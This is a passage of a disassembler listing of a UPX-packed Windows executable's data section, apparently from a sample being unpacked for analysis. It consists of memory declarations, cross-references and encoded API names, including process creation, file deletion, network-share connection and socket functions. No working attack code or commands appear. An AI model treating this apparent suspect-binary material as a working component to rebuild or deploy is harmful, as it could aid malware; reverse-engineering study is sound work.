XREF: sub_40BACE+436w dword_4CE14C dd 0 ; DATA XREF: sub_40BACE+3F6w dd 0 dword_4CE154 dd 0 ; DATA XREF: sub_40BACE:loc_40BF66r dd 0 dword_4CE15C dd 0 ; DATA XREF: sub_40B71A+Er ; sub_40B71A+32r ... dword_4CE160 dd 0 ; DATA XREF: sub_40B71A+9r ; sub_40B71A+26r ... dword_4CE164 dd 82h dup(0) ; DATA XREF: sub_40C59C+8Do dword_4CE36C dd 2 dup(0) ; DATA XREF: sub_40CF05+68o dword_4CE374 dd 2080Ah ; DATA XREF: sub_40D8A0+8w ; sub_40D99C+2D3o dd 0 dword_4CE37C dd 2 dup(0) ; DATA XREF: sub_40D99C+209o dword_4CE384 dd 0 ; DATA XREF: sub_40E4B9+1Fr ; sub_40E504+BCo ... dword_4CE388 dd 0 ; DATA XREF: sub_40E504+B7o ; sub_40E504+DAr ... dword_4CE38C dd 0 ; DATA XREF: sub_40E504+9Ao ; sub_40E504+CFr ... dword_4CE390 dd 0 ; DATA XREF: sub_40E476+35r ; sub_40E504+95o ... dword_4CE394 dd 0 ; DATA XREF: sub_40E476+17r ; sub_40E4B9+3Dr ... dd 0 dword_4CE39C dd 0C4CBh ; DATA XREF: sub_40BACE+2AEr ; sub_40E6D9+10w ... dd 0 dword_4CE3A4 dd 0 ; DATA XREF: sub_40B786+1Cr ; sub_40E6F0+27Cw dword_4CE3A8 dd 0 ; DATA XREF: sub_40EFBF+2Aw ; sub_40EFBF+51r ... dd 3 dup(0) dword_4CE3B8 dd 0 ; DATA XREF: sub_4107C0+146r align 10h dword_4CE3C0 dd 0 ; DATA XREF: sub_412352+4w ; sub_412352+9o align 8 byte_4CE3C8 db 0 ; DATA XREF: sub_412E9E+1D3w ; sub_412E9E+2D2o align 2 word_4CE3CA dw 0 ; DATA XREF: sub_412E9E+1E3w word_4CE3CC dw 0 ; DATA XREF: sub_412E9E+1E9w word_4CE3CE dw 0 ; DATA XREF: sub_412E9E+1F0w byte_4CE3D0 db 0 ; DATA XREF: sub_412E9E+1F7w byte_4CE3D1 db 0 ; DATA XREF: sub_412E9E+1FEw word_4CE3D2 dw 0 ; DATA XREF: sub_412E9E+204w dword_4CE3D4 dd 0 ; DATA XREF: sub_412E9E+234w ; sub_412E9E+250w dword_4CE3D8 dd 0 ; DATA XREF: sub_412E9E+258w byte_4CE3DC db 0 ; DATA XREF: sub_412E9E+26Aw byte_4CE3DD db 0 ; DATA XREF: sub_412E9E+27Dw word_4CE3DE dw 0 ; DATA XREF: sub_412E9E+295w word_4CE3E0 dw 0 ; DATA XREF: sub_412E9E+2A4w word_4CE3E2 dw 0 ; DATA XREF: sub_412E9E+29Cw dword_4CE3E4 dd 101h dup(0) ; DATA XREF: sub_412E9E+2B9o dword_4CE7E8 dd 80h dup(0) ; DATA XREF: sub_401ACD+2F6Fo ; sub_401ACD:loc_404AC5o ... byte_4CE9E8 db 0 ; DATA XREF: sub_414746+1A1w ; sub_414746+27Ao align 2 word_4CE9EA dw 0 ; DATA XREF: sub_414746+1AEw word_4CE9EC dw 0 ; DATA XREF: sub_414746+1B8w word_4CE9EE dw 0 ; DATA XREF: sub_414746+1C1w byte_4CE9F0 db 0 ; DATA XREF: sub_414746+1C8w byte_4CE9F1 db 0 ; DATA XREF: sub_414746+1CFw word_4CE9F2 dw 0 ; DATA XREF: sub_414746+1D6w dword_4CE9F4 dd 0 ; DATA XREF: sub_414746+1E3w dword_4CE9F8 dd 0 ; DATA XREF: sub_414746+1EBw word_4CE9FC dw 0 ; DATA XREF: sub_414746+244w word_4CE9FE dw 0 ; DATA XREF: sub_414746+22Cw word_4CEA00 dw 0 ; DATA XREF: sub_414746+256w word_4CEA02 dw 0 ; DATA XREF: sub_414746+1F7w dword_4CEA04 dd 101h dup(0) ; DATA XREF: sub_414746+265o dword_4CEE08 dd 0 ; DATA XREF: sub_401ACD+1A24w ; sub_401ACD+2F67r ... dd 3 dup(0) byte_4CEE18 db 0 ; DATA XREF: sub_414C2F+241o ; sub_414C2F+250w ... byte_4CEE19 db 0 ; DATA XREF: sub_414C2F+264w word_4CEE1A dw 0 ; DATA XREF: sub_414C2F+295w word_4CEE1C dw 0 ; DATA XREF: sub_414C2F+27Cw ; sub_414C2F:loc_415001w word_4CEE1E dw 0 ; DATA XREF: sub_414C2F+29Bw byte_4CEE20 db 0 ; DATA XREF: sub_414C2F+288w byte_4CEE21 db 0 ; DATA XREF: sub_414C2F+25Dw word_4CEE22 dw 0 ; DATA XREF: sub_414C2F+3F2w ; sub_414C2F+41Cw dword_4CEE24 dd 0 ; DATA XREF: sub_414C2F:loc_414EF8w ; sub_414C2F+39Ar dword_4CEE28 dd 0 ; DATA XREF: sub_414C2F+2D6w word_4CEE2C dw 0 ; DATA XREF: sub_414C2F+394w ; sub_414C2F+3E8o word_4CEE2E dw 0 ; DATA XREF: sub_414C2F+335w ; sub_414C2F+35Ar ... dword_4CEE30 dd 0 ; DATA XREF: sub_414C2F+30Cw ; sub_414C2F+3D9w dword_4CEE34 dd 0 ; DATA XREF: sub_414C2F+328w ; sub_414C2F+3ABw ... byte_4CEE38 db 0 ; DATA XREF: sub_414C2F+311r ; sub_414C2F+31Fw byte_4CEE39 db 0 ; DATA XREF: sub_414C2F+2DBw ; sub_414C2F+3A4w ... word_4CEE3A dw 0 ; DATA XREF: sub_414C2F+2E9w word_4CEE3C dw 0 ; DATA XREF: sub_414C2F+3F9w ; sub_414C2F+42Aw word_4CEE3E dw 0 ; DATA XREF: sub_414C2F+32Ew word_4CEE40 dw 0 ; DATA XREF: sub_414C2F+360w ; sub_414C2F+432o word_4CEE42 dw 0 ; DATA XREF: sub_414C2F+36Fw ; sub_414C2F+409w dword_4CEE44 dd 0 ; DATA XREF: sub_414C2F+369w align 10h dword_4CEE50 dd 0 ; DATA XREF: sub_414C2F+39Fw ; sub_414C2F+417o dword_4CEE54 dd 0 ; DATA XREF: sub_414C2F+33Bw byte_4CEE58 db 0 ; DATA XREF: sub_414C2F+341w byte_4CEE59 db 0 ; DATA XREF: sub_414C2F+347w word_4CEE5A dw 0 ; DATA XREF: sub_414C2F+354w dword_4CEE5C dd 7 dup(0) ; DATA XREF: sub_414C2F+3EDo dword_4CEE78 dd 0 ; DATA XREF: sub_414C2F+30w ; sub_414C2F+43Br dword_4CEE7C dd 100h dup(0) ; DATA XREF: sub_414C2F+1C3o ; sub_414C2F+47Eo dword_4CF27C dd 1000h dup(0) ; DATA XREF: sub_4151AD+1Do ; sub_41524Do ... dword_4D327C dd 0 ; DATA XREF: sub_4151AD+13o ; sub_41524D+Eo ... dword_4D3280 dd 0 ; DATA XREF: sub_4155F8+Fr ; sub_4157F1+12r align 8 dword_4D3288 dd 0Eh dup(0) ; DATA XREF: sub_416923+Fo dword_4D32C0 dd 80h dup(0) ; DATA XREF: sub_4175EA+41o dword_4D34C0 dd 200h dup(0) ; DATA XREF: sub_416F1B+C7o ; sub_417276+DDo ... dword_4D3CC0 dd 124h dup(0) ; DATA XREF: sub_416F1B+D6o ; sub_417276+F4o ... db 2 dup(0) word_4D4152 dw 0 ; DATA XREF: UPX0:off_437F28o dd 0DBh dup(0) dword_4D44C0 dd 0 ; DATA XREF: sub_416F1B+86w ; sub_4170ED+94r dword_4D44C4 dd 0 ; DATA XREF: sub_416F1B+A7w ; sub_417553+55r ... dword_4D44C8 dd 0 ; DATA XREF: sub_416F1B+A0w ; sub_4170ED+D6r ... dword_4D44CC dd 0 ; DATA XREF: sub_416F1B+79w ; sub_4170ED+35r ... dword_4D44D0 dd 80h dup(0) ; DATA XREF: sub_417553+5Eo dword_4D46D0 dd 0 ; DATA XREF: sub_416F1B+93w ; sub_4170ED+A2r align 8 dword_4D46D8 dd 0 ; DATA XREF: sub_416F1B+E7o ; sub_416F1B+103r ... dword_4D46DC dd 0 ; DATA XREF: sub_417276+17Bw ; sub_41741D+107w dword_4D46E0 dd 0 ; DATA XREF: sub_417276+180w ; sub_41741D+10Dw ... dword_4D46E4 dd 0 ; DATA XREF: sub_417276+159w ; sub_417553+4Fr dword_4D46E8 dd 0 ; DATA XREF: sub_4178BB+22w ; sub_4178BB:loc_417A40w ... dword_4D46EC dd 0 ; DATA XREF: sub_401ACD+3CC4o ; sub_417789+12o ... dd 0 dword_4D46F4 dd 0 ; DATA XREF: sub_4178BB+1Cr ; sub_417A60+3Ar dd 7Fh dup(0) dword_4D48F4 dd 0 ; DATA XREF: sub_4178BB+28r ; sub_417A60+4Aw dd 1944h dup(0) dword_4DAE08 dd 0 ; DATA XREF: sub_417A60+23o dword_4DAE0C dd 81h dup(0) ; DATA XREF: sub_401ACD+3CE2o ; sub_417789+3Co ... dword_4DB010 dd 17h dup(0) ; DATA XREF: sub_4187DE:loc_4188FBo ; sub_4187DE+131o ... dword_4DB06C dd 80h dup(0) ; DATA XREF: sub_419594+7Co ; sub_419594+A5o dword_4DB26C dd 0 ; DATA XREF: sub_418B59+45w ; sub_418B59+4Dr ... dword_4DB270 dd 17h dup(0) ; DATA XREF: sub_419460:loc_419582o ; sub_419460+12Do dword_4DB2CC dd 80h dup(0) ; DATA XREF: sub_418A99+4Co ; sub_418A99+7Eo ... byte_4DB4CC db 0 ; DATA XREF: sub_418B59+29r ; sub_418B59+34w align 10h dword_4DB4D0 dd 80h dup(0) ; DATA XREF: sub_418DB0+61o ; sub_418DB0+89o ... dword_4DB6D0 dd 81h dup(0) ; DATA XREF: sub_4186C2:loc_4186FAo ; sub_4186C2+5Bo dword_4DB8D4 dd 0 ; DATA XREF: sub_419A21:loc_419A42r ; sub_419B10+54r ... dword_4DB8D8 dd 0 ; DATA XREF: sub_419A21r ; sub_419B10+37r ... dword_4DB8DC dd 0 ; DATA XREF: sub_419A51+1Ar ; sub_419C65+83o dword_4DB8E0 dd 0 ; DATA XREF: sub_419A21:loc_419A35r ; sub_419C65+11Bw dword_4DB8E4 dd 0Dh dup(0) ; DATA XREF: sub_419B10+13o ; sub_419C65:loc_419DA2o dword_4DB918 dd 0 ; DATA XREF: sub_419B10+CDr ; sub_419B10+ECr ... align 10h dword_4DB920 dd 0Eh dup(0) ; DATA XREF: sub_41A88C+47o dword_4DB958 dd 0 ; DATA XREF: sub_41BBBD+1B9w ; sub_41D1EC:loc_41D268w ... dword_4DB95C dd 0 ; DATA XREF: sub_41D3BE+35w ; sub_41DA72:loc_41DB0Cw ... dword_4DB960 dd 0 ; DATA XREF: sub_423A33+13Ar dword_4DB964 dd 0A28h ; DATA XREF: UPX0:0041D985w dword_4DB968 dd 501h ; DATA XREF: UPX0:0041D97Cw dword_4DB96C dd 5 ; DATA XREF: UPX0:0041D971w dword_4DB970 dd 1 ; DATA XREF: UPX0:0041D963w dword_4DB974 dd 1 ; DATA XREF: sub_401221:loc_401516r ; sub_422F83+91w dword_4DB978 dd 930B20h ; DATA XREF: sub_401221+2FEr ; sub_401221+31Er ... align 10h dword_4DB980 dd 930B48h ; DATA XREF: sub_422ECA+44w ; sub_425AC7+9r ... dword_4DB984 dd 0 ; DATA XREF: sub_4261AB+36r dword_4DB988 dd 0 ; DATA XREF: sub_425AC7+16r ; sub_425E95+4r ... align 10h off_4DB990 dd offset aCM_unpackerPac ; DATA XREF: sub_422F83+2Ew ; "C:\\m_unpacker\\packed.exe" align 8 byte_4DB998 db 0 ; DATA XREF: sub_41B7D3+2Dw ; sub_4239DB+5r align 4 dword_4DB99C dd 0 ; DATA XREF: sub_41B7D3+27w dword_4DB9A0 dd 0 ; DATA XREF: sub_41B7D3+4r ; sub_41B7D3+8Bw dword_4DB9A4 dd 0 ; DATA XREF: sub_41C0F4+3Br ; sub_41C0F4+91w dd 0 dword_4DB9AC dd 0 ; DATA XREF: sub_41C748+Aw dword_4DB9B0 dd 0 ; DATA XREF: sub_41D081+5Er ; sub_41D081+A4w align 8 word_4DB9B8 dw 0 ; DATA XREF: sub_41D081+55r ; sub_41D081+9Ao word_4DB9BA dw 0 ; DATA XREF: sub_41D081+48r db 2 dup(0) word_4DB9BE dw 0 ; DATA XREF: sub_41D081+3Br word_4DB9C0 dw 0 ; DATA XREF: sub_41D081+2Er word_4DB9C2 dw 0 ; DATA XREF: sub_41D081+21r align 8 dword_4DB9C8 dd 0 ; DATA XREF: UPX0:0041D9B7w ; sub_422ECA:loc_422EDCr ... align 10h dword_4DB9D0 dd 0 ; DATA XREF: sub_41DA29r sub_41DA4Er ... dword_4DB9D4 dd 0 ; DATA XREF: sub_41EB10+4Bw ; sub_41EC29+2Dw ... dword_4DB9D8 dd 0 ; DATA XREF: sub_41F312r dword_4DB9DC dd 0 ; DATA XREF: sub_41B202:loc_41B31Er ; sub_41B202:loc_41B43Fr ... dword_4DB9E0 dd 1 ; DATA XREF: sub_41FEA9:loc_420024r ; sub_420042+4w ... dword_4DB9E4 dd 0 ; DATA XREF: sub_420446+37r dd 0 dword_4DB9EC dd 0 ; DATA XREF: sub_4219D9+11r ; sub_421ADD+1Ar ... byte_4DB9F0 db 0 ; DATA XREF: sub_4219D9+3r ; sub_4219D9+98r ... align 4 dword_4DB9F4 dd 0 ; DATA XREF: sub_421ADD+11r ; sub_421BBB+21w ... byte_4DB9F8 db 0 ; DATA XREF: sub_421BBB+51w align 4 dword_4DB9FC dd 0 ; DATA XREF: sub_421DB1+4Er ; sub_42218C+3Ar ... dword_4DBA00 dd 0 ; DATA XREF: sub_421DB1+5Cr ; sub_42218C+43r ... dword_4DBA04 dd 0 ; DATA XREF: sub_41C9CE+7Ar ; sub_421F58+5r dword_4DBA08 dd 0 ; DATA XREF: sub_42255C+29r dword_4DBA0C dd 2 dup(0) ; DATA XREF: sub_41D160+Co dword_4DBA14 dd 0 ; DATA XREF: sub_41D5AA+4r ; sub_41D5AA+6Er ... dd 3 dup(0) dword_4DBA24 dd 0 ; DATA XREF: sub_41D834+61r ; sub_41D834+BFr ... dd 0 dword_4DBA2C dd 1 ; DATA XREF: sub_422ACA+28r ; sub_422ACA+4Cw ... dword_4DBA30 dd 0 ; DATA XREF: sub_422CEE+3Ar ; sub_422CEE+46w ... aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_422F83:loc_422F9Ao ; UPX1:off_4DB990o align 10h dd 3Ah dup(0) dword_4DBB38 dd 1 ; DATA XREF: sub_4231D0+2r ; sub_4231D0+23w ... dword_4DBB3C dd 0 ; DATA XREF: sub_423590+21r dword_4DBB40 dd 0 ; DATA XREF: sub_41F32D+154w ; sub_420446:loc_42046Fw ... dword_4DBB44 dd 0 ; DATA XREF: sub_41F32D+7r dword_4DBB48 dd 1 ; DATA XREF: sub_423CEC+26r ; sub_423CEC:loc_423D56w align 10h word_4DBB50 dw 0 ; DATA XREF: sub_4245E9+1Ao ; sub_4245E9+46r byte_4DBB52 db 0 ; DATA XREF: sub_4245E9+39r align 4 dword_4DBB54 dd 7 dup(0) ; DATA XREF: sub_4245E9+52o dword_4DBB70 dd 0 ; DATA XREF: sub_4245E9+40w ; sub_4245E9+5Co dword_4DBB74 dd 0 ; DATA XREF: sub_4245E9+4Dw dword_4DBB78 dd 0 ; DATA XREF: sub_4245E9+31w dword_4DBB7C dd 0 ; DATA XREF: sub_4245E9+52w dword_4DBB80 dd 77C26E79h ; DATA XREF: sub_42470C:loc_42472Fr ; sub_42470C+38r ... align 8 dword_4DBB88 dd 0 ; DATA XREF: sub_4247EC+11w ; sub_4247EC+63w ... align 10h dword_4DBB90 dd 0 ; DATA XREF: sub_4247EC+33o ; sub_4247EC+46r dword_4DBB94 dd 10h dup(0) ; DATA XREF: sub_4247EC+C1o word_4DBBD4 dw 0 ; DATA XREF: sub_424A4A+A8r word_4DBBD6 dw 0 ; DATA XREF: sub_4247EC+54r ; sub_424A4A+DBr ... word_4DBBD8 dw 0 ; DATA XREF: sub_424A4A+CAr word_4DBBDA dw 0 ; DATA XREF: sub_424A4A+D3r ; sub_424A4A:loc_424B3Cr word_4DBBDC dw 0 ; DATA XREF: sub_424A4A+C0r word_4DBBDE dw 0 ; DATA XREF: sub_424A4A+B8r word_4DBBE0 dw 0 ; DATA XREF: sub_424A4A+B0r word_4DBBE2 dw 0 ; DATA XREF: sub_424A4A+9Er dword_4DBBE4 dd 0 ; DATA XREF: sub_4247EC+4Br dword_4DBBE8 dd 10h dup(0) ; DATA XREF: sub_4247EC+FBo word_4DBC28 dw 0 ; DATA XREF: sub_424A4A+46r word_4DBC2A dw 0 ; DATA XREF: sub_4247EC:loc_424863r ; sub_424A4A+78r ... word_4DBC2C dw 0 ; DATA XREF: sub_424A4A+67r word_4DBC2E dw 0 ; DATA XREF: sub_424A4A+70r ; sub_424A4A:loc_424ACEr word_4DBC30 dw 0 ; DATA XREF: sub_424A4A+5Dr word_4DBC32 dw 0 ; DATA XREF: sub_424A4A+55r word_4DBC34 dw 0 ; DATA XREF: sub_424A4A+4Dr word_4DBC36 dw 0 ; DATA XREF: sub_424A4A+3Er dword_4DBC38 dd 0 ; DATA XREF: sub_4247EC+80r dword_4DBC3C dd 0 ; DATA XREF: sub_4247EC+132r ; sub_4247EC:loc_424938r ... dword_4DBC40 dd 0 ; DATA XREF: sub_4247D7r sub_4247D7+Ew dword_4DBC44 dd 0 ; DATA XREF: sub_424D78+3r ; sub_424D78+2Ew ... dword_4DBC48 dd 0 ; DATA XREF: sub_424D78+43w ; sub_424D78:loc_424DC7r dword_4DBC4C dd 0 ; DATA XREF: sub_424D78+4Aw ; sub_424D78+60r dword_4DBC50 dd 0 ; DATA XREF: sub_423A33+3Fr dword_4DBC54 dd 0 ; DATA XREF: sub_425955:loc_4259BCr ; sub_425955+6Do dword_4DBC58 dd 0 ; DATA XREF: sub_425955:loc_425993r ; sub_425955+44o dword_4DBC5C dd 0 ; DATA XREF: sub_425955:loc_425986r ; sub_425955+37o dword_4DBC60 dd 0 ; DATA XREF: sub_425955:loc_4259A0r ; sub_425955+51o align 8 dword_4DBC68 dd 0 ; DATA XREF: sub_425F03+28r ; sub_425F03+48w ... dword_4DBC6C dd 0 ; DATA XREF: sub_426988+28r ; sub_426988+4Cw ... dword_4DBC70 dd 0 ; DATA XREF: sub_426C13+26r ; sub_426C13:loc_426C7Dw byte_4DBC74 db 1 ; DATA XREF: sub_40D879r sub_40D879+9w align 4 dword_4DBC78 dd 931110h ; DATA XREF: sub_41DBF0:loc_41DC01r ; sub_41F49D+14r ... align 10h dword_4DBC80 dd 400h dup(0) ; DATA XREF: UPX0:off_43D0C8o ; UPX0:0043D0D0o dword_4DCC80 dd 200h ; DATA XREF: sub_41DBF0+9r ; sub_41DBF0+56r ... dd 7 dup(0) dword_4DCCA0 dd 930650h ; DATA XREF: sub_41F043+75r ; sub_41F11C+2Ar ... dword_4DCCA4 dd 3Fh dup(0) ; DATA XREF: sub_423302+92o dword_4DCDA0 dd 20h ; DATA XREF: sub_41DA72+8r ; sub_41F11C+Cr ... dword_4DCDA4 dd 4E4h ; DATA XREF: sub_41FEA9+14r ; sub_41FEA9+65w ... align 10h dword_4DCDB0 dd 3 dup(0) ; DATA XREF: sub_41FEA9+123o ; sub_41FEA9+171o ... dword_4DCDBC dd 0 ; DATA XREF: sub_41FEA9+108w ; sub_41FEA9+15Dw ... byte_4DCDC0 db 0 ; DATA XREF: sub_4200E8:loc_4201F4w ; sub_4200E8:loc_420211w ... align 4 dd 0Fh dup(0) dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h dd 77767574h, 7A7978h, 0 dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h dd 57565554h, 5A5958h, 0 dd 83000000h, 0 dd 9A0000h, 9E009Ch, 2 dup(0) dd 8A0000h, 0FF8E008Ch, 2 dup(0) dd 0AA0000h, 2 dup(0) dd 0B500h, 0BA0000h, 0 dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h dd 9FDEDDDCh byte_4DCEC0 db 0 ; DATA XREF: sub_41FEA9+5Co ; sub_41FEA9+AFo ... byte_4DCEC1 db 0 ; DATA XREF: sub_41B9D1+5Dr ; sub_41FEA9+A0w ... align 4 dd 0Fh dup(0) dd 10100000h, 6 dup(10101010h), 0 dd 20200000h, 6 dup(20202020h), 2 dup(0) dd 20h, 10000000h, 10001000h, 2 dup(0) dd 20000000h, 20002000h, 10h, 0 dd 20000000h, 2 dup(0) dd 200000h, 20000000h, 0 dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h) dd 20202000h, 20202020h, 20h dword_4DCFC4 dd 0 ; DATA XREF: sub_41FEA9+6Ew ; sub_41FEA9+12Bw ... dword_4DCFC8 dd 0 ; DATA XREF: sub_41DE2F+3Cw ; sub_41E4D4+5r ... dword_4DCFCC dd 0 ; DATA XREF: sub_41DEA2+23Ar ; sub_41DEA2+25Ar ... dword_4DCFD0 dd 0 ; DATA XREF: sub_41DE2F+31w ; sub_41DEA2+311w ... dword_4DCFD4 dd 0 ; DATA XREF: sub_41DE2F+21w ; sub_41DEA2+22Dr ... dword_4DCFD8 dd 0 ; DATA XREF: sub_41DE2F+28w ; sub_41DE77r ... dword_4DCFDC dd 0 ; DATA XREF: sub_41DE2F+15w ; sub_41DE77+8r ... dword_4DCFE0 dd 0 ; DATA XREF: sub_41B202+5Cr ; sub_41B513+Fr ... dword_4DCFE4 dd 930000h ; DATA XREF: sub_41B0B1+5Ar ; sub_41B202+C0r ... dword_4DCFE8 dd 1 ; DATA XREF: sub_41B0B1+Cr ; sub_41B202:loc_41B232r ... dword_4DCFEC dd 142340h ; DATA XREF: UPX0:0041D9ADw ; sub_422E72+Fr ... dword_4DCFF0 dd 1 ; DATA XREF: sub_422ECA+ADw ; sub_425AC7r dword_4DCFF4 dd 1 ; DATA XREF: sub_42026Dr ; sub_42026D+11w ... dword_4DCFF8 dd 93075Ch ; DATA XREF: sub_41B7D3+3Er ; sub_41CFD3+13r ... dword_4DCFFC dd 930758h ; DATA XREF: sub_41B7D3+35r ; sub_41B7D3+57r ... dd 400h dup(0) db 74h ; t align 4 db 0 db 60h, 2, 0 db 1 aFindfirstfilea db 'FindFirstFileA',0 db 1 aSetenvironment db 'SetEnvironmentVariableA',0 db 1, 43h, 6Fh aMparestringw db 'mpareStringW',0 db 1, 43h, 6Fh aMparestringa db 'mpareStringA',0 db 1, 53h, 65h aTendoffile db 'tEndOfFile',0 db 1 aIsbadcodeptr db 'IsBadCodePtr',0 db 1, 49h, 73h aBadreadptr db 'BadReadPtr',0 db 1 aSetunhandledex db 'SetUnhandledExceptionFilter',0 dd 74654701h, 69727453h, 7954676Eh, 576570h, 74654701h dd 69727453h, 7954676Eh, 416570h, 756C4601h, 69466873h dd 7542656Ch, 72656666h, 53010073h, 74537465h, 6E614864h dd 656C64h, 74654701h, 656C6946h, 65707954h, 65470100h dd 64745374h, 646E6148h, 100656Ch, 48746553h, 6C646E61h dd 756F4365h, 100746Eh, 45746547h, 7269766Eh, 656D6E6Fh dd 7453746Eh, 676E6972h, 1005773h, 45746547h, 7269766Eh dd 656D6E6Fh, 7453746Eh, 676E6972h, 46010073h, 45656572h dd 7269766Eh, 656D6E6Fh, 7453746Eh, 676E6972h, 1005773h dd 65657246h, 69766E45h, 6D6E6F72h, 53746E65h, 6E697274h dd 417367h, 686E5501h, 6C646E61h, 78456465h, 74706563h dd 466E6F69h, 65746C69h, 4C010072h, 70614D43h, 69727453h dd 57676Eh, 4D434C01h, 74537061h, 676E6972h, 48010041h dd 53706165h, 657A69h, 69615201h, 78456573h, 74706563h dd 6E6F69h, 74654701h, 434D454Fh, 45010050h, 50746978h dd 65636F72h, 1007373h, 736F6C43h, 6E614865h, 656C64h dd 65724301h, 50657461h, 65636F72h, 417373h, 74654701h dd 75646F4Dh, 6946656Ch, 614E656Ch, 41656Dh, 74654701h dd 74737953h, 69446D65h, 74636572h, 4179726Fh, 6C530100h dd 706565h, 65724301h, 54657461h, 61657268h, 44010064h dd 74656C65h, 6C694665h, 1004165h, 6E65704Fh, 636F7250h dd 737365h, 74654701h, 72727543h, 50746E65h, 65636F72h dd 64497373h, 65470100h, 73614C74h, 72724574h, 100726Fh dd 79706F43h, 656C6946h, 53010041h, 69467465h, 7441656Ch dd 62697274h, 73657475h, 47010041h, 69467465h, 7441656Ch dd 62697274h, 73657475h, 47010041h, 6F4D7465h, 656C7564h dd 646E6148h, 41656Ch, 69615701h, 726F4674h, 676E6953h dd 624F656Ch, 7463656Ah, 72430100h, 65746165h, 6574754Dh dd 1004178h, 54746547h, 436B6369h, 746E756Fh, 65540100h dd 6E696D72h, 54657461h, 61657268h, 47010064h, 65547465h dd 6150706Dh, 416874h, 766F4D01h, 6C694665h, 1004165h dd 64616F4Ch, 7262694Ch, 41797261h, 65470100h, 6F725074h dd 64644163h, 73736572h, 65470100h, 6D6F4374h, 65747570h dd 6D614E72h, 1004165h, 4C746547h, 6C61636Fh, 666E4965h dd 100416Fh, 56746547h, 69737265h, 78456E6Fh, 45010041h dd 54746978h, 61657268h, 4C010064h, 65766165h, 74697243h dd 6C616369h, 74636553h, 6E6F69h, 746E4501h, 72437265h dd 63697469h, 65536C61h, 6F697463h, 4901006Eh, 6974696Eh dd 7A696C61h, 69724365h, 61636974h, 6365536Ch, 6E6F6974h dd 53646E41h, 436E6970h, 746E756Fh, 65440100h, 6574656Ch dd 74697243h, 6C616369h, 74636553h, 6E6F69h, 69725701h dd 69466574h, 100656Ch, 61657243h, 76456574h, 41746E65h dd 65520100h, 69466461h, 100656Ch, 61657243h, 69466574h dd 41656Ch, 72655401h, 616E696Dh, 72506574h, 7365636Fh dd 44010073h, 696C7075h, 65746163h, 646E6148h, 100656Ch dd 43746547h, 65727275h, 7250746Eh, 7365636Fh, 43010073h dd 74616572h, 70695065h, 47010065h, 69547465h, 6F46656Dh dd 74616D72h, 47010041h, 61447465h, 6F466574h, 74616D72h dd 47010041h, 69467465h, 6953656Ch, 100657Ah, 646E6946h dd 736F6C43h, 46010065h, 54656C69h, 54656D69h, 7379536Fh dd 546D6574h, 656D69h, 6C694601h, 6D695465h, 4C6F5465h dd 6C61636Fh, 656C6946h, 656D6954h, 69460100h, 654E646Eh dd 69467478h, 41656Ch, 74655301h, 656C6946h, 6E696F50h dd 726574h, 74655301h, 736E6F43h, 43656C6Fh, 486C7274h dd 6C646E61h, 1007265h, 74696157h, 4D726F46h, 69746C75h dd 4F656C70h, 63656A62h, 1007374h, 656E6547h, 65746172h dd 736E6F43h, 43656C6Fh, 456C7274h, 746E6576h, 65470100h dd 636F4C74h, 69546C61h, 100656Dh, 72657551h, 72655079h dd 6D726F66h, 65636E61h, 6E756F43h, 726574h, 65755101h dd 65507972h, 726F6672h, 636E616Dh, 65724665h, 6E657571h dd 1007963h, 65657246h, 7262694Ch, 797261h, 74654701h dd 69766E45h, 6D6E6F72h, 56746E65h, 61697261h, 57656C62h dd 65480100h, 72467061h, 1006565h, 70616548h, 6F6C6C41h dd 47010063h, 72507465h, 7365636Fh, 61654873h, 56010070h dd 75747269h, 75516C61h, 45797265h, 52010078h, 50646165h dd 65636F72h, 654D7373h, 79726F6Dh, 65470100h, 73795374h dd 496D6574h, 6F666Eh, 726F4601h, 4D74616Dh, 61737365h dd 416567h, 6F6C4701h, 556C6162h, 636F6C6Eh, 4701006Bh dd 61626F6Ch, 636F4C6Ch, 5501006Bh, 70616D6Eh, 77656956h dd 6946664Fh, 100656Ch, 5670614Dh, 4F776569h, 6C694666h dd 43010065h, 74616572h, 6C694665h, 70614D65h, 676E6970h dd 53010041h, 69467465h, 6954656Ch, 100656Dh, 46746547h dd 54656C69h, 656D69h, 70784501h, 45646E61h, 7269766Eh dd 656D6E6Fh, 7453746Eh, 676E6972h, 1004173h, 65646957h dd 72616843h, 754D6F54h, 4269746Ch, 657479h, 6C754D01h dd 79426974h, 6F546574h, 65646957h, 72616843h, 736C0100h dd 6D637274h, 416970h, 74654701h, 74697845h, 65646F43h dd 636F7250h, 737365h, 65655001h, 6D614E6Bh, 69506465h dd 1006570h, 4C746547h, 6369676Fh, 72446C61h, 73657669h dd 6C470100h, 6C61626Fh, 6F6D654Dh, 74537972h, 73757461h dd 65480100h, 65527061h, 6F6C6C41h, 52010063h, 6E556C74h dd 646E6977h, 65470100h, 6D695474h, 6E6F5A65h, 666E4965h dd 616D726Fh, 6E6F6974h, 65470100h, 73795374h, 546D6574h dd 656D69h, 74654701h, 72617453h, 49707574h, 416F666Eh dd 65470100h, 6D6F4374h, 646E616Dh, 656E694Ch, 47010041h dd 65567465h, 6F697372h, 4701006Eh, 6E457465h, 6F726976h dd 6E656D6Eh, 72615674h, 6C626169h, 1004165h, 70616548h dd 74736544h, 796F72h, 61654801h, 65724370h, 657461h, 72695601h dd 6C617574h, 65657246h, 69560100h, 61757472h, 6C6C416Ch dd 100636Fh, 61427349h, 69725764h, 74506574h, 47010072h dd 50437465h, 6F666E49h, 65470100h, 50434174h, 810000h dd 61D80000h, 57010002h, 4174654Eh, 6F436464h, 63656E6Eh dd 6E6F6974h, 4132h, 89h, 261E0h, 0FF0007FFh, 0CFF000Fh dd 74FF00h, 0FF0073FFh, 0AFF0015h, 2FF00h, 0FF000DFFh dd 57010001h, 6F534153h, 74656B63h, 0BFF0041h, 9FF00h dd 0FF0004FFh, 3FF0010h, 17FF00h, 0FF0013FFh, 97FF0012h dd 6FF00h, 0 dd offset dword_445750+0F8B0h dd 4014C00h, 18DA3300h, 47h, 0 dd 0F00E000h, 6010B01h, 2600000h, 0B600000h, 0 dd 1D93300h, 